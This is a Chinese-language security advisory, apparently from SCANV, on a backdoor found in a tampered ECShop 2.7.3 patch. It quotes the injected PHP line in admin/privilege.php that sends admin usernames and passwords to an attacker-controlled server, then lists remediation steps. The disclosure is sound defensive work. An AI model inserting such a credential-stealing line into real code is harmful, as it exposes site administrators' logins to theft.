ECShop是很多站长喜欢用的网店程序,其V2.7.3版本用户甚众。
2013年5月,SCANV网站安全中心曾经响应过ECShop网店程序的后门事件,本以为此事已了,不料在近日,又有安全研究人员在漏洞平台Wooyun上发现了ECShop官方补丁的后门代码。
经SCANV网站安全研究人员分析发现,这一次的后门代码存在于一个编号为273utf8_patch006的历史补丁文件包中。骇客将补丁包里的(\admin\privilege.php)文件篡改后,插入了一段记录后台用户及密码等信息的代码,并发送到一个由黑客控制的服务器上。值得注意的是,SCANV安全研究人员在分析前两次补丁后门代码里并没有发现本次的后门代码,因此,本次后门事件可能发生在前两次篡改之前。
本次骇客植入的后门代码:
文件\admin\privilege.php代码113-114行:
@file_get_contents('http://[马赛
克]/api/manyou/ECShop/w2.php?username='.$_POST['username'].'&password='.$_POST['password'].'---'.$_SERVER['REMOTE_ADDR'].'---'.date('Y-m-d|H:i:s').'---'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF']);
通过进一步分析发现“http://[马赛克]/”网站实际是被黑客入侵控制的网站(“肉鸡”),而且黑客用来收集密码等信息的文件目录还可以“历遍文件”,如图:
#p#
经过SCANV网站安全研究人员的下载并去重,发现大概有90个域名网站受影响。列表如下:
SCANV网站安全研究中心推荐的解决方案:
1、使用ecshoop的站长朋友,核对上面公布的域名,并查看文件\admin\privilege.php内容,搜索关键词“w2.php”。如果找到上面提到的恶意代码,请直接删除后保存。
2、修改所有拥有后台权限的用户的密码,并通知网站所有用户修改密码。
3、复查网站及服务器的安全状况。
目前,官方已在6月3日发布新的补丁包
(http://bbs.ECShop.com/thread-1130889-1-1.html),请站长及时检查修复。
SCANV网站安全中心在此提醒广大站长,为自己Web程序下载补丁文件时一定要做相应的检查,哪怕该补丁文件是从官方网站上下载的,也有可能感染恶意后门。正在使用该网店程序的站长可登录:http://www.scanv.com/tools/#ECShop给自己的ECShop站点做个安全检测,平时可经常登录SCANV网站安全中心,以便第一时间了解自己网站的安全情况。
